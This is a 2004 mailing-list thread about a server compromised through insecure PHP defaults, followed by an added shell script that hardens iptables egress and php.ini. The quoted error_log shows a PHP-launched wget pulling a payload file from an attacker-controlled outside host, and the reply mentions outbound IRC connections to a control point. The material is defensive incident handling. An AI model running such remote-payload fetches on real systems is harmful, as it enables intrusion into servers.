OT. Have I been hacked? IRCD?
Chris Stark
cstark at hawaii.edu
Tue Dec 14 05:26:34 UTC 2004
mark at onnow.net wrote:
> I found d0s3.txt in my /tmp dir.
>
> Not sure how it got there. Found this too:
>
> Here is the log file from error_log.1
>
> --19:21:21-- http://@#!@#!@#!@#!yeah.freesuperhost.com/d0s3.txt
> => `d0s3.txt'
> Resolving @#!@#!@#!@#!yeah.freesuperhost.com... done.
> Connecting to @#!@#!@#!@#!yeah.freesuperhost.com[70.84.229.131]:80...
> connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 20,419 [text/plain]
>
> 0K .......... ......... 100% 74.68 KB/s
>
> 19:21:23 (74.68 KB/s) - `d0s3.txt' saved [20419/20419]
>
> Not quite sure how this happened
>
> Mark
>
Greetings,
I had the same thing happen. It seems that the vulnerability is due to
crappy settings in the default install of PHP. Here are a few things to
help prevent it...
1) Write your own custom iptables rules that tightly restrict BOTH
incoming and outgoing traffic. Although ports 80 & 443 were open on my
server, it wouldn't allow the outgoing connections back to the
attacker's control point because it used 6667 which was not explicitly
allowed.
2) Change the default upload and session directories for PHP (or turn
uploads off if you don't need them).
3) Run PHP in safe mode.
4) Turn off the ability to include remote files in PHP.
5) Disable functions like exec, popen, and passthru.
Since making these adjustments, I haven't had any further issues with
this particular attack. I'm surprised there hasn't been more noise made
over this one.
Aloha,
Chris
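The five steps above, carried through as one script. This is an added example, not code from Chris's post or from the fedora-list thread: it emits an iptables policy that accepts 80/443 inbound but defaults OUTPUT to DROP (so the PHP-spawned wget in Mark's error_log, or a bot connecting out to 6667, fails), and it rewrites the PHP settings from items 2, 4 and 5 in a php.ini. The resolver address, admin network, directory paths and the sample php.ini are assumptions; `DRY_RUN=1` prints the iptables commands instead of running them, so the policy can be reviewed without root. safe_mode (item 3) is not set because it was removed in PHP 5.4; `disable_functions` and `allow_url_fopen`/`allow_url_include` cover what it was meant to gate.

```shell
#!/bin/sh
# Added example for the hardening steps in the thread (not the poster's code).
# Ports, addresses, paths and the sample php.ini below are assumptions.

# Run iptables, or print the command when DRY_RUN=1 (review without root).
ipt() {
    if [ "${DRY_RUN:-0}" = "1" ]; then
        echo "iptables $*"
    else
        iptables "$@"
    fi
}

# Item 1, egress side: default DROP, then allow only what the box needs.
# Outbound 6667 (IRC) and outbound 80/443 are deliberately absent, so a
# "wget http://.../d0s3.txt" launched through PHP has nowhere to go.
egress_rules() {
    dns_server="${DNS_SERVER:-192.0.2.53}"   # assumed resolver (TEST-NET address)
    ipt -P OUTPUT DROP
    ipt -A OUTPUT -o lo -j ACCEPT
    ipt -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    ipt -A OUTPUT -p udp -d "$dns_server" --dport 53 -j ACCEPT
    ipt -A OUTPUT -p tcp -d "$dns_server" --dport 53 -j ACCEPT
    # Add a pinned update mirror here if yum/apt needs out; never a blanket 80/443.
    ipt -A OUTPUT -j LOG --log-prefix "EGRESS-DROP: " --log-level 4
}

# Item 1, ingress side: web ports open to the world, ssh only from an admin net.
ingress_rules() {
    ipt -P INPUT DROP
    ipt -A INPUT -i lo -j ACCEPT
    ipt -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    ipt -A INPUT -p tcp --dport 80 -j ACCEPT
    ipt -A INPUT -p tcp --dport 443 -j ACCEPT
    ipt -A INPUT -p tcp -s "${ADMIN_NET:-198.51.100.0/24}" --dport 22 -j ACCEPT
}

# Set key = value in a php.ini: replace an existing (possibly ';'-commented)
# line for that key, or append the setting if the key is not present.
set_ini() {
    f="$1"; k="$2"; v="$3"
    if grep -Eq "^[[:space:];]*$k[[:space:]]*=" "$f"; then
        sed -E "s|^[[:space:];]*$k[[:space:]]*=.*|$k = $v|" "$f" > "$f.tmp" \
            && mv "$f.tmp" "$f"
    else
        printf '%s = %s\n' "$k" "$v" >> "$f"
    fi
}

# Items 2, 4 and 5: uploads off (or a private tmp dir), no remote includes,
# no shell-spawning functions. Paths are assumed; create them mode 0700, owned
# by the web server user, outside world-writable /tmp.
harden_php_ini() {
    f="$1"
    set_ini "$f" file_uploads Off
    set_ini "$f" upload_tmp_dir /var/lib/php/upload
    set_ini "$f" session.save_path /var/lib/php/session
    set_ini "$f" allow_url_fopen Off
    set_ini "$f" allow_url_include Off          # exists in PHP >= 5.2
    set_ini "$f" disable_functions "exec,passthru,shell_exec,system,popen,proc_open"
    set_ini "$f" expose_php Off
}

# Read-back check: succeeds only if every hardened value is active and
# uploads no longer land in /tmp.
check_php_ini() {
    f="$1"
    grep -Eq '^allow_url_fopen = Off$' "$f" &&
    grep -Eq '^allow_url_include = Off$' "$f" &&
    grep -Eq '^disable_functions = .*popen' "$f" &&
    grep -Eq '^file_uploads = Off$' "$f" &&
    ! grep -Eq '^upload_tmp_dir = /tmp$' "$f"
}

# Constructed php.ini fragment resembling the permissive defaults of the time.
make_sample_ini() {
    cat > "$1" <<'EOF'
[PHP]
file_uploads = On
upload_tmp_dir = /tmp
;session.save_path = /tmp
allow_url_fopen = On
disable_functions =
EOF
}

# Usage (as root, after reviewing "DRY_RUN=1 sh harden.sh"):
#   ingress_rules; egress_rules; harden_php_ini /etc/php.ini && check_php_ini /etc/php.ini
```

Run it once with `DRY_RUN=1` and read the printed rules before applying them: a default-DROP OUTPUT chain with the wrong resolver address locks the box out of DNS, and the LOG rule at the end of OUTPUT is what shows you, in syslog, the 6667 or port-80 attempts a compromised PHP process makes afterwards.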